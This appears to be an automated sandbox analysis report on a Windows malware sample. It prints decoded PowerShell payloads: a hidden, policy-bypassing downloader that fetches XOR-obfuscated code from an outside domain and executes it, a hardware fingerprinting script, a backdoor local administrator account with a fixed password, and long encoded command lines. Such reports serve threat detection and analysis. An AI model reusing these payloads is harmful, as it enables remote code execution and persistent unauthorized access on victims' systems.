Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9886
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9894

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep count: 9846 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5112	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992	Thread sleep count: 9706 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996	Thread sleep count: 141 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep count: 9929 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2348	Thread sleep count: 9910 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8272	Thread sleep count: 9884 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520	Thread sleep count: 9886 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208	Thread sleep count: 9894 > 30

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\net1.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\D2526140-28DE-4516-A926-80A0BB7F1F2E-Sigs
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\D2526140-28DE-4516-A926-80A0BB7F1F2E-Sigs\NULL
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy\NULL
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\CzxeZkonPYZsXfBdDDcOrmpy\config.cfg
Source: C:\Windows\Temp\svczHost.exe	File opened: C:\Windows\Temp\Crashpad\reports\NULL

Source: powershell.exe, 00000008.00000002.3831537178.00000223CDEF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000008.00000002.3831537178.00000223CDEF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: powershell.exe, 00000008.00000002.4467052107.00000223E5604000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.3831537178.00000223CDEF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000000.00000002.3648370742.0000015FEC09B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3534880776.000002B4FB37B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4453976855.00000223E55A5000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACCF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000014.00000002.4105244846.0000024E64021000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\Temp\myRdpService.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $uri = "https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg \| ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages \| ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive \| Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test \| Out-File -FilePath "deviceId.txt" -Encoding UTF8
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
Source: C:\Windows\Temp\svczHost.exe	Process created: Base64 decoded get-service "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.Screen]::AllScreens \| ForEach-Object { "$($_.Bounds.Width)x$($_.Bounds.Height)" } \| Out-File -FilePath "C:\Windows\Temp\dp"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qlxhihga\qlxhihga.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4364.tmp" "c:\Users\user\AppData\Local\Temp\qlxhihga\CSCB3BD9BA87EAD4F1291288FCEAEB15417.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZ